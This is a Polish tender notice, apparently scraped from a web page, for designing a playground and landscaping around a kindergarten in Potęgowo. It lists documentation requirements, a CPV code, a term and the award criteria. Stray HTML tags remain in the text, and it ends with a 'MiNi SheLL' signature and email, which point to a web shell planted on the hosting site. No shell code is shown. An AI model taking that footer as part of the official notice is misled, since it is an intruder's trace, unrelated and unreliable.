Zagospodarowanie przestrzeni publicznej polega na budowie placu zabaw dla dzieci oraz zagospodarowanie terenu wokół budynku wraz z chodnikami i ścieżkami pieszymi oraz zakup niezbędnych materiałów i sprzętu do zagospodarowania terenu. W zakres wchodzi także zakup roślin, altany, ławeczek, elementów ozdobnych małej architektury  itp.
W ramach projektu należy wykonać:
Zakres prac projektowych podzielony jest na dwa etapy:
ETAP I - koncepcja zagospodarowania przestrzeni publicznej wokół budynku Przedszkola.
ETAP II - projekt zagospodarowania 
Dokumentacja techniczna i projektowo-budowlana obejmująca: 
- opracowanie pełnobranżowego projektu budowlano - wykonawczego -5 egz. 
- sporządzenie przedmiarów robót każda branża osobno;
- sporządzenie kosztorysów inwestorskich każda branża osobno;
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
- sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych:
- uzyskanie warunków, opinii i uzgodnień (w tym: z właścicielami działek, UG Potęgowo, gestorami uzbrojenia sieciowego);
- uzyskanie wszelkich wymaganych decyzji i zezwoleń,
- dokumentację (pkt 1-5) należy dostarczyć także w wersji elektronicznej.
- Dokumentacja techniczna musi być kompletna do złożenia wniosku o pozwolenie na budowę lub zgłoszenie robót budowlanych bez sprzeciwu.

Nadzór autorski - dotyczy całego zakresu przedsięwzięcia objętego zamówieniem w terminie wykonania inwestycji, w tym np. uzupełnienia i zmiany nieistotne w opracowanych projektach technicznych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. termin wykonania II etapu - 6</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com